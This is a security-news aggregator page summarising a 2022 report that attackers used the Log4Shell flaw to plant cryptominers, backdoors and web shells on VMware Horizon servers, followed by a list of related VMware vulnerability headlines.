Security News > 2022 > March > Log4JShell Used to Swarm VMware Servers with Miners, Backdoors
What researchers are calling a "Horde" of miner bots and backdoors are using the Log4Shell bug to take over vulnerable VMware Horizon servers, with threat actors still actively waging some attacks.
On Tuesday, Sophos reported that the remote code execution Log4j vulnerability in the ubiquitous Java logging library is under active attack, "Particularly among cryptocurrency mining bots." Besides cryptominers, attackers are also prying open Log4Shell to deliver backdoors that Sophos believes are initial access brokers that could lay the groundwork for later ransomware infections.
In late December and January, VMWare's Horizon servers with Log4Shell vulnerabilities came under Cobalt Strike attack, as flagged by researchers at Huntress.
Those attacks used the Lightweight Directory Access Protocol resource call of Log4j to retrieve a malicious Java class file that modified existing, legitimate Java code, injecting a web shell into the VM Blast Secure Gateway service and thereby granting attackers remote access and code execution.
The attacks against Horizon servers grew throughout January.
Saryu Nayyar, CEO and founder of Gurucul, told Threatpost that in order to fight the legitimate assessment tools being used to breach organizations, it's also "Critical" to employ sophisticated technologies - namely, self-training machine learning and behavioral models - to sniff out exploitation of exposed vulnerabilities as well as to detect the remote surveillance done by attackers with tools such as Cobalt Strike, et al.
News URL
https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/
Related news
- Broadcom fixes critical RCE bug in VMware vCenter Server (source)
- VMware patches remote make-me-root holes in vCenter Server, Cloud Foundation (source)
- Critical VMware vCenter Server bugs fixed (CVE-2024-38812) (source)
- Week in review: Critical VMware vCenter Server bugs fixed, Apple releases iOS 18 (source)
- Critical Zimbra RCE flaw exploited to backdoor servers using emails (source)
- VMware Releases vCenter Server Update to Fix Critical RCE Vulnerability (source)
- VMware fixes critical vCenter Server RCE bug – again! (CVE-2024-38812) (source)
- VMware fixes bad patch for critical vCenter Server RCE flaw (source)
- Week in review: Fortinet patches critical FortiManager 0-day, VMware fixes vCenter Server RCE (source)